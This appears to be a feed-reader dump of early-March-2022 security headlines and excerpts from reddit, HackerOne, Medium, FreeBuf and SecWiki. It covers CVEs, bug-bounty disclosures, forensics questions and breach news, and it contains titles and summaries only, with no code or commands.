    A request that's been pretty consistent within the industry over time has had to do with reporting. I'd see a request, some responses, someone might ask for a template, and then the exchange would die off...I assumed that it had moved to DMs or offline. Then you'd see the discussion pop up again later, in some other forum. I get it...writing is hard. I have the benefit of having had to write throughout my career, but also of putting intentional, dedicated effort into DFIR reporting, in that I had been very purposeful in seeking feedback from my boss, and incorporating that feedback into report writing. I was able to get to the point of having reports approved with minimal (if any) changes pretty quickly.  As a result, in 2014, Windows Forensic Analysis Toolkit 4/e was published, and in thi…
  • Open

    PSA: reddit appears to be removing posts/comments containing *.ru URLs
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

  • Open

    Big Collection of 720p Movies, solid speeds, haven't explored all the directories, so I'm marking NSFW just in case.
    submitted by /u/SatansMoisture [link] [comments]
    Classic TV: Various video qualities, decent speeds
    submitted by /u/SatansMoisture [link] [comments]
  • Open

    A Detailed Guide on Wfuzz
    Introduction Many tools have been developed that create an HTTP request and allow a user to modify their contents. Fuzzing works the same way. A The post A Detailed Guide on Wfuzz appeared first on Hacking Articles.
  • Open

    webOS Revisited - Even More Mistaken Identities · The Recurity Lablog
    submitted by /u/addelindh [link] [comments]
  • Open

    Question about protecting my data while traveling .
    Traveling a lot this week and was just wondering what kind of vpn you guys use while traveling and any other security measures you may have :) submitted by /u/Savage-shredder [link] [comments]
    Good US based infosec recruiters?
    I never thought I would say this, normally being on the hiring side, but has anyone had positive experience for US-based boutique infosec recruiters that they would recommend? I’ve found several listed in CISO magazine and such but don’t know if any are particularly clue-full. Public or DM is fine, thanks! submitted by /u/venerable4bede [link] [comments]
  • Open

    Cloudflare WAF bypass via Origin IP
    Cloudflare supports more than 16 million Internet attributes and is now one of the most popular WAFs(Web Application Firewalls). A year… Continue reading on Medium »
    Bug Bounty: Open Xmlrpc.php vulnerability on WordPress site.
    what is Xml-RPC? Continue reading on Medium »
  • Open

    SecWiki News 2022-03-05 Review
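    Efficiently Mining Deserialization Vulnerabilities: GadgetInspector Modifications by ourren; JS Security: AST Obfuscation by ourren; Development Notes on an OpenResty-Based Security Gateway by ourren. For more recent articles, visit SecWiki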
  • Open

    How to collect a forensic image of a VSXI/EXSI that has been infected with ransomware?
    How to collect a forensic image of a VSXI/EXSI that has been infected with ransomware? submitted by /u/rvndomus3r2019 [link] [comments]
    Copying Hard Drive
    I am sending a hard drive I own into Cyber Forensics. If possible, I am looking for software advice to copy the hard drive before sending it in to experts. Additionally, if you have advice for transferring the files from the software to a type of hardware, I would appreciate it. Thanks. submitted by /u/Odd-Switch-1658 [link] [comments]
  • Open

    UK’s vulnerability to corruption uncovered amid slow sanctions response
    Article URL: https://www.theguardian.com/commentisfree/2022/mar/05/uks-vulnerability-to-corruption-uncovered-amid-slow-sanctions-response Comments URL: https://news.ycombinator.com/item?id=30566774 Points: 9 # Comments: 0
  • Open

    Plugins for Persistence (Sublime Text & VS Code)
    submitted by /u/hanbei-undying [link] [comments]
  • Open

    unclaimed subdomain special.rkeeper.ru to takeover from tilda.cc
    Mail.ru disclosed a bug submitted by mainteemoforfun: https://hackerone.com/reports/1045644
  • Open

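    FreeBuf Morning News | Credentials of 71,000 Nvidia employees leaked; CPPCC member proposes setting up a cybersecurity and data protection window
    Nvidia released a report acknowledging that attackers stole employee passwords and undisclosed Nvidia proprietary information from its systems.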
  • Open

    Expat library: libexpat 2.4.7 (CVE fixes)
    Article URL: https://github.com/libexpat/libexpat/blob/R_2_4_7/expat/Changes Comments URL: https://news.ycombinator.com/item?id=30564782 Points: 1 # Comments: 0
  • Open

    Open source intelligence: What can we find from photos?
    Tryhackme: Searchlight — IMINT — Part 2 Continue reading on Medium »

  • Open

    Misinformation, Disinformation and Subterfuge, Part One:
    How I triggered a weaponized Fake-Left Troll Farm meant to harass, target, defame and deplatform prominent Disinformation researchers. Continue reading on Medium »
    Maltego Basics: Building a Network Diagram
    This post is a step-by-step guide to create a network diagram in Maltego. Continue reading on Medium »
    The OSINT Toolkit!
    Baidu Maps http://map.baidu.com/ Continue reading on System Weakness »
    OSINT: Digital “influencer” arrested after being identified doing dance videos
    Imagine doing your trending dance on TikoTeko and being arrested right after? Well, that is what happened. Continue reading on Medium »
  • Open

    The perils of the “real” client IP [or the many ways to use X-Forwarded-For incorrectly]
    submitted by /u/yesyoucantrip [link] [comments]
    A Backdoor Lockpick : Reversing Phicomm’s Backdoor Protocols
    submitted by /u/stargravy [link] [comments]
    Hacking Hadoukens: Reverse Engineering a Street Fighter Two Cabinet
    submitted by /u/wrongbaud [link] [comments]
    ICS & OT Risk and Vulnerability Report
    submitted by /u/h4ck3dit [link] [comments]
    Finding an Authorization Bypass on my Own Website - SQL Injection in a Parameterized Query
    submitted by /u/mdulin2 [link] [comments]
    New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
    submitted by /u/YuvalAvra [link] [comments]
  • Open

    Normal User is able to EXPORT Feature Usage Statistics
    Lark Technologies disclosed a bug submitted by aishkendle: https://hackerone.com/reports/1470076 - Bounty: $500
    Brute force attack of current password on login page by bypassing account limit using IP rotator(https://dashboard.omise.co/signin)
    Omise disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1466967
  • Open

    Fuzzing unsafe code in a Rust crate
    Nearly all Rust code is memory-safe. A necessary part of using Rust is to use the wide ecosystem of third-party Rust crates. These are… Continue reading on Medium »
  • Open

    Does bluetooth create a vulnerability for the broadcasting device itself?
    I see how bluetooth is a vulnerability to the data that's being transferred over the connection but does it pose an actual threat to, lets say, a phone's internal data? Or are they just going to be able to listen along to my music? submitted by /u/zeff_05 [link] [comments]
    Airbnb Donations
    Does Airbnb have a robust enough infosec team to prevent Russian hackers from registering fake properties in the Ukraine to take advantage of all the people in America lazy enough to only donate to Ukrainians through reserving Airbnb's? submitted by /u/intentropy [link] [comments]
    Why would an inbound email from a 3rd party have an IP internal to our org in the SPF record?
    I'm looking at an email that was suspected as a phish and for the most part it's fairly benign but there's a few areas in the headers that don't add up for me. The call to action in the email was to update some Site-to-Site VPN addresses to US Bank. Important to note that we don't currently have anything like that established with them, though the support numbers appear to be official and I just don't clearly see where the hook here is yet. The part that confuses me most is that the sender IP listed as the first SPF record is our public NAT address for client VPNs and not even one of our mail servers. The headers do refer to one of our mail servers further down, however it's the wrong IP. I'm new to the org though so may not have all the pieces to the puzzle. Are there simple explanations…
    Utilization - Does Your Organization Care? Do Your Employees Like it in InfoSec?
    Hey Everyone. Moderating this Subreddit throughout the past 6 or so months I have seen the topic come up quite a bit regarding utilization. While Metrics need to be gathered to determine whether an employee does their job or not, having baselines often causes stress, unrealistic expectations, and caveats that often cause issues with this requirement (IE Training on common security topics/trends/New Threat Landscapes) As far as I know, having a growth mindset and focusing on metrics related to security inside the organization is the way to go, and not micromanaging employees on the numbers each one of them push out. I'd be interested to hear others and their thoughts on this, and how it relates to your employees and organization. submitted by /u/Envyforme [link] [comments]
    Dealing with impostor syndrome?
    Leaving it kinda brief, I have around 6 years in Security starting off as a QA and deployment engineer, and later moving on to partners and doing what I consider architecture. Most of my background is focused on SIEM. Scoping out deployments, talking to clients about what to log and understanding their requirements and how to change/modify their environments to match our services offerings etc. Anyway I took a "Security Architect" role at a big 5 firm and definitely realized I'm under prepared. What can I do to make sure I don't get fired? I didn't entirely oversell myself and I was totally open about my experience, I just feeling way overwhelmed with the level everyone else in my group is at. submitted by /u/Kirin-Jack [link] [comments]
    Should I learn gdb or GNU debugger? If yes, then why?
    Idk what to write submitted by /u/The_Intellectualist [link] [comments]
    Software Developer Administrative Rights
    What is everyone else doing to effectively control (remove) the use of administrative rights on workstations development team members use? We’ve pulled local admin rights from general employees years ago without much issue but every time we approach our dev teams to do it it’s just impossible as it too extremely inhibits their work as they legitimately need to do config management for locally installed services (eg IIS) and maybe less legitimately installing “development tools”. I’d add, we do have pro, qa, dev, sandbox environments but the devs still choose to do development on their desktop systems for “performance” reasons which there is some truth to as we give them beefy hardware (tons of ram/top end CPUs). Edit: after some good dialog here seems like common perspective is to put them in an isolated environment such as a VM. Thanks everyone for the discussion. Still monitoring this so chime in with any other thoughts/experience. submitted by /u/clayjk [link] [comments]
    Nvidia Breach
    It looks like there are two certificates now compromised as a result of the Nvidia breach. What if anything should organisations be doing to protect themselves? submitted by /u/annonuk2020 [link] [comments]
  • Open

    CVE-2021-4128: PfSense 2.5.2 Shell Upload
    Article URL: https://packetstormsecurity.com/files/166208/pfSense-2.5.2-Shell-Upload.html Comments URL: https://news.ycombinator.com/item?id=30557143 Points: 10 # Comments: 0
  • Open

    SecWiki News 2022-03-04 Review
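    Mnemosyne: An Efficient Watering Hole Attack Investigation and Forensics System by ourren; GoDLP: A Sensitive Information Protection System by ourren; Make JDBC Attacks Brilliant Again: Side Story by ourren; Attack Flow — Beyond Atomic Behaviors by ourren. For more recent articles, visit SecWiki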
  • Open

    New Linux vulnerability affecting cgroups: can containers escape?
    Article URL: https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/ Comments URL: https://news.ycombinator.com/item?id=30556188 Points: 91 # Comments: 58
  • Open

    steps to run before analyzing the iphone image
    steps to run before forensic analyze: turn off screenlock, turn off backup, turn off find my iphone, what else? submitted by /u/cyberfo [link] [comments]
    Career Advice
    I've been working in eDiscovery and forensics for about three years, mostly lit support and low-level investigations. I hold CFCE and CCE certs. Currently enrolled in Champlain and I'll be wrapping up my B.S. in Computer Forensics and Digital Investigations. I'm located in an HCOL area and thinking of transitioning to a different company due to pay disparity. IR is in greater demand, so I imagine I'll be able to leverage more money in that field. What steps (training, certs, etc.) should I take to prepare myself if I decide to change my focus to DFIR? submitted by /u/stickyricky714 [link] [comments]
    Trying to MFTExplorer but it returns an error. Any way to circumvent this?
    submitted by /u/KTthemajicgoat [link] [comments]
    Interesting
    submitted by /u/kramps_ [link] [comments]
  • Open

    PORTSWIGGER WEB SECURITY - WEBSOCKETS LAB SOLUTIONS
    WebSocket is a bidirectional protocol that provides data transfer between client and server and, like HTTP, is widely used in modern web applications… Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CLICKJACKING LAB SOLUTIONS
    Clickjacking: as a result of the target user clicking a malicious link hosted in the web application by the attacker, various… Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CORS (CROSS-ORIGIN RESOURCE SHARING) LAB SOLUTIONS
    CORS (Cross-Origin Resource Sharing), which provides controlled access to resources outside a given domain… Continue reading on Medium »
    Gold Bug Bounty Resources | Web Application, Android & iOS Security
    Take your time and start learning from these Resources. Continue reading on Medium »
    The Secret trick for subdomain Enumeration
    Probably the most covered topic in bug bounty hunting and web apps is subdomain enumeration. Continue reading on Medium »
    Bug Bounty Toolkit
    Bug bounty platforms and programs Continue reading on System Weakness »
  • Open

    [Day 9] Networking Where Is All This Data Going | Advent of Cyber 3 (2021)
    No content preview
    HTML Injection via user agent leads to website distortion revealing backend code.
    No content preview
  • Open

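    FreeBuf Weekly | Up to 1 TB of Nvidia data stolen; Toyota halts production after a supplier suffers a cyberattack
    A summary and recommendation of this week's hot news, quality articles and hassle-free tools, so that you do not miss any of this week's highlights!
    Avast releases a free decryption tool for HermeticRansom, which hit Ukraine
    Recently, Avast released a free decryption tool for the HermeticRansom ransomware, solely to help Ukrainian victims of the ransomware threat recover their data.
    On a Simple Penetration Test
    A summary of a simple penetration test
    Cyberspace Administration of China releases the "Provisions on the Administration of Internet Pop-up Information Push Services (Draft for Comment)"
    The Provisions clearly state that anyone providing services such as operating systems, terminal devices, application software or websites within China must comply with these provisions when offering internet pop-up information push services.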

  • Open

    Computer workstation question
    Hello everyone, I know this has been asked before however I’m going to build a forensics workstation for my department; we don’t have a lot of money to throw around to do a dual CPU set up. I was wondering if anyone would recommend the newest I9-12900k CPU for processing, or any other processor for the most efficient in imaging. I mainly use Magnet Axiom and Cellebrite. One thing I’m having trouble with is finding a good MOBO, what would you all recommend, I need enough ports for a write blocker and multiple HDDS, and M.2 SSD’s. Thanks submitted by /u/ExiisTT [link] [comments]
    Microsoft Surface Go 2 - Bitlocked and Paladin
    Good day, all! I am working with a MS Surface Go 2. I have/had the PIN to access the device. I did obtain a memory capture and logical image of the C: drive using FTKi. After obtaining that data, I tried to boot into Paladin but it would not load/boot. I went into the UEFI and disabled the Secure Boot option, knowing this may cause the device to become bitlocked - which it did, but did allow Paladin to boot. As I do 99% phones, this one is throwing me for a loop and I am seeking some guidance. I am now able to image the drive using Paladin, but obviously it will be bitlocked. The recovery key "should" be captured in the RAM, right? And if so, how do I decrypt the data once loaded (or before). I would be using Axiom to load the data. Thanks in advance for any insights and help! submitted by /u/Responsible_Dig_2899 [link] [comments]
    Executed files
    Hi, how can I investigate executed malicious file like maldoc or any executable? How to get the list of artifacts? Thanks submitted by /u/0X900 [link] [comments]
    Cellebrite UFED file system extraction
    Does Cellebrite support file system extraction for deleted file? if yes, do we need to root the iphone or Android phone for data extraction? submitted by /u/cyberfo [link] [comments]
    The Truth About USB Device Serial Numbers – (and the lies your tools tell) - Computer Evidence Recovery
    Quote from article: What we have then discovered, is that in most cases, external portable devices are not properly reported in Windows, at least insofar as what regards a Serial Number. This becomes incredibly problematic when your forensic reports says that the device serial number is “ABCD”, and an opposing expert says it is “EFGH”. Who is right? It is tough to convince a court that your tool is right and the label from the manufacturer is wrong. Are you examining a plastic container? Or are you examining a hard drive? What you do matters. Lives are affected by the work of digital forensics practitioners. https://www.computerpi.com/the-truth-about-usb-device-serial-numbers-and-the-lies-your-tools-tell/ submitted by /u/Erminger [link] [comments]
    detect data exfiltration to USB
    How to detect data exfiltration to external USB drive through $MFT, thanks submitted by /u/cyberfo [link] [comments]
  • Open

    Analysing 3177 organisations to track the 10 most popular email spam and malware filters
    submitted by /u/Jumpy_Resolution3089 [link] [comments]
    SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store
    submitted by /u/Goovscoov [link] [comments]
    A Closer Look at the Russian Actors Targeting Organizations in Ukraine
    submitted by /u/CyberMasterV [link] [comments]
    Bypassing Google's Cloud Armor firewall with an 8 KB request
    submitted by /u/almostfamous [link] [comments]
  • Open

    OSINT: Corporate Recon — HTB Academy Walkthrough
    INTRODUCTION: Continue reading on Medium »
    OSINT challenge
    Tryhackme: Searchlight — IMINT Continue reading on Medium »
    Shodan Dorks: Chasing CVEs, Photos and Gas Station Tank Controllers.
    Any cybersecurity enthusiast knows the Shodan search engine, but would you know how to use the right parameters to “Dork… Continue reading on Medium »
    A cybersecurity and cyber intelligence enthusiast with many things to tell you.
    ¿Are u re4dy? Continue reading on Medium »
    OSINT ON GMAIL ACCOUNTS
    Google Hunt Tool Continue reading on System Weakness »
    Metagoofil
    (LET’S EXPLORE HIDDEN FILES) Continue reading on Medium »
  • Open

    Hacken's Role in Ukraine's Cyber Defense: The Latest AMA with Dyma Budorin
    The Hacken team recently held its first AMA session with our CEO Dyma Budorin since the start of Russia's invasion of Ukraine… Continue reading on Medium »
    Host Header Injection Leads To Pre-Account Takeover Worth 100$
    Self Introduction : Continue reading on Medium »
    Weakly Typed SQL Injection
    Programming languages come in two categories: Hard/Strong Typed Soft/Weak Typed Continue reading on Techiepedia »
    A Clickjacking - Which Rewarded me with 275$
    Vulnerability Category: A6- Security Misconfiguration Continue reading on Medium »
    Found API Token on js file
    Continue reading on Medium »
  • Open

    Uber Test Report 20220301
    Uber disclosed a bug submitted by johnzilla313: https://hackerone.com/reports/1496297
    Subdomain Takeover at https://new.rubyonrails.org/
    Ruby on Rails disclosed a bug submitted by nagli: https://hackerone.com/reports/1429148
    stand.pw.mail.ru xss
    Mail.ru disclosed a bug submitted by smallyu: https://hackerone.com/reports/1400197
  • Open

    (1st post) Atari FTP Archive : Atari/8bit/demoscene related material since 2002. 845GB in 938689 files
    submitted by /u/Pablouchka [link] [comments]
    Bald Actors
    https://www.baldactors.com/wp-content/uploads/2016/03/ submitted by /u/SnooObjections8515 [link] [comments]
    Was searching funnies...
    Seems like my post has been deleted again... Why not just take out the links that offend... Personal info is not personal if it is on the web... So Here is some funny... http://www.p14nd4.com/ars/ Starts here... http://www.thedevilsdue.us http://www.thedevilsdue.us/!.Music/AllMusic/!.DW.80GB/My%20Music/ music http://alliza.iptime.org/mobile/%c8%a8%c6%fa%b4%f5/%c1%c1%c0%ba%c0%da%b7%e1%bd%c7/%c0%bd%be%c7%c0%da%b7%e1%bd%c7/ http://iama.stupid.cow.org/Audio/ https://video.donaldandcheryl.net/Funny/ https://simpsons.porn/assets/images/ http://edmazur.com/images/funny/ http://fricking.ninja/Media/photo_comments/mp4/ http://www.kyudan.com/funny/Corel%20Auto-Preserve/ http://www.kyudan.com/funny/img/ images... https://alt-tab.org/data/images/ submitted by /u/xanderTgreat [link] [comments]
    Printable Origami Paper Directory
    https://www.origamiway.com/printable-origami-paper/ submitted by /u/shaburushaburu [link] [comments]
  • Open

    Chrome 100 Beta: Reduced User-Agent Strings, Multi-Screen Window Placement, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 100 is beta as of March 3, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Last Version for Unreduced User-Agent String: Chromium 100 will be the last version to support an unreduced User-Agent string by default (as well as the related navigator.userAgent, navigator.appVersion, and navigator.platform DOM APIs). The origin trial that allowed sites to test the fully reduced User-Agent will end on April 19, 2022. After that date, the User-Agent String will be gradually reduced. To review …
  • Open

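    [Security Bulletin] Spring Cloud Gateway Remote Code Execution Vulnerability Risk...
    Recently, Spring officially released a CVE report on Spring Cloud Gateway, which includes the Spring Cloud Gateway remote code execution vulnerability (CVE-2022-22947). An attacker can use this vulnerability to maliciously create...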
  • Open

    A Case Study: Defending against ransomware with Microsoft Defender for Endpoint and Intel TDT
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
    CVE-2022-0492 is the third recent kernel vulnerability that allows malicious containers to escape. We offer root cause analysis and mitigations. The post New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape? appeared first on Unit42.
  • Open

    My computer keeps saying "network certificate not valid" or something like that, whenever I go to reddit, download libraries with gradle, basically anything at all. Am I under attack?
    SWE but no idea why I keep getting a red message in Chrome when I try to go to websites I normally go to submitted by /u/oaxac9 [link] [comments]
    How can one protect oneself in case some devices of one's family get infected?
    One of my family has been complaining about her phone being always laggy. Which shouldn't happen because she uses a relatively new device? Well, there is also a possibility that she doesn't kill background processes. But lately, I have been noticing the network becomes really laggy (supposedly it's not because of Ukraine?), and sometimes it just completely shuts down/disconnects. Since we share the same wifi, are there any things I can do? Something to suggest to her, or for me to avoid getting infected, just in case. Thank you in advance! edit: I'm not sure if I should also include this but. I have a windows tablet and a Linux desktop that connects to the router through ethernet all the time. To be honest, I am not even sure if it can affect me in any way, since I'm not educated at all in cybersecurity. Hopefully I'm just paranoid? Just to be sure haha, sorry for random posting. submitted by /u/manho1e [link] [comments]
    Where can I check if a website downloaded a force file?
    I mean if the website forced a download of a file, sorry, no force thing. I noticed today that my hosts file was modified and was 127.0.0.1 suspiciousaddress. I checked the address on web scanners and said clean but that it had an ascii file, small, 170 characters, maybe a script? I by mistake put the address on google and the browser tried to open it, I closed it and my internet crashed as soon as I did that so now I'm worried. I also tried to enter using the ip and not the dns and got a message but didn't write it down. I'd like to check if the website is downloading something on my pc, some script etc, or what else can I do? Thanks in advance. submitted by /u/HeroOfTheNorthF [link] [comments]
    Malware implication if I run VM via gnome boxes?
    I would like to check if malware could affect my main system (Silverblue), if I run windows or other linux distro via gnome boxes - could malware get into main os? If it could get affected, then would having amnesic help? I was reading how in some cases paging/ram could get copied into hard disk. So not sure. submitted by /u/AtomicFurion [link] [comments]
    What's your favourite Sandbox ?
    Hi guys, I'm going to build a simple home lab on a budget . Need recommendations regarding easy to deploy sandbox. What's your favorite sandbox and why? submitted by /u/breadcrumb2000 [link] [comments]
  • Open

    SecWiki News 2022-03-03 Review
    From Cyberspace Cognitive Warfare to Large-Scale Network-Paralyzing Attacks on Russia by ourren Analysis of the China Mobile GS3101 Optical Modem: A Bait and Switch by ourren Learning Java Security with 三梦: Semi-Automated Vulnerability Hunting by ourren TA402 Continues to Attack Middle East Targets by Avenger For more of the latest articles, visit SecWiki
  • Open

    Manipulating User Passwords Without Mimikatz
    There are two common reasons you may want to change a user’s password during a penetration test: You have their NT hash but not their plaintext password. Changing their password to a known plaintext value can allow you to access services in which Pass-the-Hash is not an option. You don’t have their NT hash or... The post Manipulating User Passwords Without Mimikatz appeared first on TrustedSec.
  • Open

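    FreeBuf Morning Report | Open-Source PJSIP Library Affected by Critical Vulnerabilities; MIIT Issues Rules Restricting App Download Behavior
    Against the backdrop of the escalating Russia-Ukraine conflict, the US Senate unanimously passed the Strengthening American Cybersecurity Act.
    How to Prevent Phishing Emails? SMIME Email Security Certificates Can Help!
    Phishing (pronounced like the English word "fishing", also known as a phishing attack) works by impersonating a bank or other well-known institution to send deceptive emails to victims, luring recipients into providing their sensitive information (such as usernames, passwords, ATM transaction PINs or
    Risk Rising! Data Leaks and Shadow Assets Expand the Enterprise Network Attack Surface
    Data leaks and shadow assets are the largest source of cyberattacks facing large organizations worldwide.
    Gamers Beware! Hackers Are Spreading Malware That Can Hijack Social Media Accounts
    It mainly gets in through Microsoft's app store in the form of trojanized game applications.
    Russia Considers Cyberattacks on Its Satellites an Act of War, but Not Its Invasion of Ukraine
    A hacker group affiliated with Anonymous announced that it had shut down the control center of the Russian space agency.
    Cyber Warfare Has Become the "Fifth Battlefield": These Figures Show the Current State of Ukraine's Networks
    Russian President Putin announced a special military operation in the Donbas region of eastern Ukraine. Beyond the real-world hot war, the "cyber war" between Russia and Ukraine had in fact begun long before.
    MITRE Adversary Engagement Framework V1 and a Series of Implementation Guidance Documents Released
    Adversary engagement guidance for active defense practitioners
    CIS 2021 Conference Spring Edition Begins On-Site Recording: Gathering in Spring to Talk Security
    On the morning of March 2, on-site recording of the two-day "CIS 2021 Cybersecurity Innovation Conference, Spring Edition" began at the Baohua Marriott Hotel in Shanghai.
    New Tactic! A New Trend in Gambling Platform Payment Channels: Virtual Currency Becomes the "New Favorite"
    Virtual currency has become the "darling" of deposit and withdrawal channels on gambling platforms, while third-party top-up methods such as WeChat and Alipay, which used to dominate, are gradually disappearing from some gambling platforms.
    HTTP and HTTPS: Six Common Questions
    Some readers have raised questions about HTTP and HTTPS. The editor has collected several common questions and answers them for you, hoping to help as much as possible and give you a deeper understanding of HTTP and HTTPS.
    APT29 Uses Pandemic-Themed Lures to Attack Embassy Personnel
    Recently, APT29 changed targets again, shifting its focus from SolarWinds to embassies.
    New Variant of the Modular Banking Trojan IcedID Surfaces
    IcedID is a modular banking trojan first disclosed in 2017 and one of the most prevalent malware families of recent years.
    In Depth | Shared Data in the Financial Industry Is Complex and Intertwined: How to Strengthen the Foundations of Data Security?
    Data classification and grading can effectively promote the secure sharing of financial data between institutions and within the industry, and helps unlock and realize the value of data in the financial industry.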

  • Open

    IDOR delete any Tickets on ads.tiktok.com
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1475520 - Bounty: $5000
    Open Redirect TO Stealing aadvid
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1378533 - Bounty: $500
    Reflected XSS on www.pornhub.com and www.pornhubpremium.com
    Pornhub disclosed a bug submitted by wh0ru: https://hackerone.com/reports/1354161 - Bounty: $750
  • Open

    4300$ Instagram IDOR Bug (2022)
    Hello everyone! Today I'm going to explain how I found a 4300$ IDOR Bug on Instagram. Continue reading on Medium »
    My personal favourite top 20 hacking tools.
    1. Nmap (Network Mapper) Continue reading on Medium »
    What is the John The Riper(JTR)? How to use JTR?
    What is the John The Riper? Continue reading on Medium »
    How did I find Directory Traversal attack using GitHub
    Hello, Continue reading on Medium »
    Bug Bounty — How to approach Vulnerabilities ( PART 1 )
    Hello people, it’s me again. In most cases, with automated tools, you can possibly find low level security bugs i.e most likely Blind XSS… Continue reading on Medium »
    IDOR in support.mozilla.org through Code Review
    I was trying to improve my static analysis code, specifically django apps, so I decided to hack a random project in github. And I found… Continue reading on Medium »
    Community Newsletter — March 2022
    As the Pandora community continues to grow stronger with each passing day, we would like to take this opportunity to thank everyone for… Continue reading on Pandora Protocol »
    Do data practitioners are the new (security) weakest link?
    Secrets in code Continue reading on CodeX »
    Business Logic Bug| Email Existing Bypass | Running 2 accounts with a single email
    Vulnerability Category: Business Logic Error Continue reading on Medium »
    Find bugs by Google dork method
    Cre : https://medium.com/@fcwdbrqmr/400-bounty-again-using-google-dorks-6dc8e438f017 Continue reading on Medium »
  • Open

    Could artifacts be missing from Magnet Axiom?
    Hi there, hoping some of you are Magnet Axiom users and may be able to help me with this conundrum I have *some nonessential information has been altered for protection*: I have received a Portable Case from someone who has full license to the platform. I understand how the Portable Case is created (via watching the Magnet tutorial videos). The Portable Case is supposed to contain the contents of John Doe's cell phone. Separately, I have Snapchat Returns for John Doe's Snapchat account, and as far as is known John Doe only owned the one aforementioned cell phone. In looking at the Artifacts in the Portable Case, there seem to be things missing. For example: The Portable Case is supposed to cover a time period of 01/01/2XXX through 05/15/2XXX. When comparing the Snapchat Returns > Snapchat Memories I am able to see a specific video file - I'll call it "Selfie A" - from 02/03/2XXX 08-48-56 UTC. But when looking at the Portable Case > CHAT > Snapchat Memories artifacts there is no corresponding artifact. There are other video artifacts from that same date and around that time, but not "Selfie A." There are many files I have identified with this same issue. So now the question: I will admit I have not had formal training on Axiom (nor am I a digital forensics professional by trade) so I am willing to withhold suspicion for now, but, is it possible that artifacts could appear from Snapchat Returns that were missed in Axiom? Maybe "Selfie A" was deleted from the phone so it doesn't appear in Axiom but it does appear in the Returns data from Snapchat? (I hate even typing that question because I know even "deleted" things can be forensically recovered but go with me here). Or, is it more likely that the "Selfie A" artifact is visible in the Snapchat Returns but not in the Portable Case because the creator of said Portable Case chose not to include the artifact? submitted by /u/mclaughlinkessell [link] [comments]
    Tips on the GDAT certification (SEC599)
    Hi all, I have just enrolled for the SEC599 (OnDemand) and will be going through the GDAT exam as well. Are there any tips which could help me prepare better and pass the exam? My intro - Have been into SOC and IR for 5+ years now, and this is going to be my first certification submitted by /u/Suchi-Bee [link] [comments]
    Pagefile/ Cache question
    Hey Guys I work in law and as you probably have experienced we are stunningly ignorant on computer forensics. When I have a bit of time I like to research various computer forensic things and evidence from browsers are quite fascinating to me. I have two questions that I'd love help answering. 1) I'm assuming that this is a stupid/ basic question but I read that pictures in the cache are copies of the original essentially and as such they would contain meta data like locations and so on, is that also correct for stuff in the pagefile? 2) I've messed around with the Belkasoft software trial run to view the pagefile on my PC, the categories that the data is broken up into is fairly understandable browsers, instant messengers. And they contain images and urls. However there is a category called other files and I'm not sure what is contained in them? submitted by /u/curiousstudent99l [link] [comments]
  • Open

    Thought this might be of interest
    submitted by /u/TiThelis [link] [comments]
    CALISHOT 2022-03: Find ebooks amongst 395 Calibre sites this month.
    submitted by /u/throwaway176535 [link] [comments]
  • Open

    If you change the SIM card, google will automatically add that number to your google account.
    A tech at Verizon put his personal SIM in my phone to see if it could support the network. I'm attempting to change from ATT to Verizon on my unlocked android phone. A little while later, a notification from google that his personal phone number has been added to my Google account(s), alongside my own phone #. Does this mean that you can access someone's Google account(s) by surreptitiously inserting a SIM into their phone, even if you don't have their pin# or severed finger? submitted by /u/Dougolicious [link] [comments]
    Ghosted after vulnerability disclosure
    I recently disclosed an unauthenticated RCE to a company that provides virtual network appliances, the process was going good and they patched the vulnerability, but upon my request for patch release/notes they ghosted me. I already have CVE numbers assigned but would like to have mitre publish them but don't know what to do if the company is not being cooperative, anyone have any suggestions? submitted by /u/BasedThug [link] [comments]
    Should I pursue the OSCP certification?
    I have 6 years of experience as a software engineer, and recently started working as an Application Security Engineer doing mostly static and dynamic analysis of our apps. I have plenty of books and online courses to work through, and recently started tinkering with HackTheBox. I thought about pursuing the OSCP cert. Realistically with a full-time security job and other obligations I probably won't be able to commit all my spare time to this, so the 30/60/90 day lab access periods probably won't be enough time to finish the course. The 1 year long lab access is $2500, which is quite a steep price. I'm curious to know if the OSCP training will benefit me in a way that my job and HackTheBox won't. submitted by /u/cppnewb [link] [comments]
    ISO 27001:2021 GAP analysis
    Hi, I'm working for a company which is ISO 27001:2013 certified and I was asked to do a GAP analysis on ISO 27001:2021 standard. So if there are any useful articles or any references, please share it. TIA submitted by /u/darkwolf-95 [link] [comments]
    Thoughts on Kaspersky AV/Anti-malware after recent events?
    Hey all, Wondering what your thoughts are on kaspersky as an AV tool, and as a company given recent events. Do you think with all the independent reviewers that they could still be compromised by say KGB/Russian government? Sorry, not trying to be political, but the recent events can be directly tied to multiple netsec topics. submitted by /u/Fizgriz [link] [comments]
  • Open

    moodle 2nd order sqli 0-day
    submitted by /u/mufinnnnnnn [link] [comments]
    How to analyze malicious documents – Case study of an attack targeting Ukrainian Organizations
    submitted by /u/CyberMasterV [link] [comments]
    Guardio security team discovered an active network of sophisticated crypto attacks targeting the MetaMask wallet
    submitted by /u/oldrobgin [link] [comments]
  • Open

    Bash Tricks for File Exfiltration over HTTP/S using Flask
    submitted by /u/cyberbutler [link] [comments]
  • Open

    SecWiki News 2022-03-02 Review
    Closed-Loop Data Security Management Practice for Partners by ourren For more of the latest articles, visit SecWiki
  • Open

    Bash Tricks for File Exfiltration over HTTP/S using Flask
    This post outlines techniques to exfiltrate files using curl and encode, encrypt, and save captured files using a custom Flask Web Server Continue reading on Maveris Labs »
  • Open

    Driver from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    My First Osint Challenge
    One fine day I was Scrolling through tweets and my eyes got a tweet that Dan Conn tweeted a osint challenge on Oct 5, 2021 mentioning his… Continue reading on Medium »
    Maltego OSINT Tool Intro
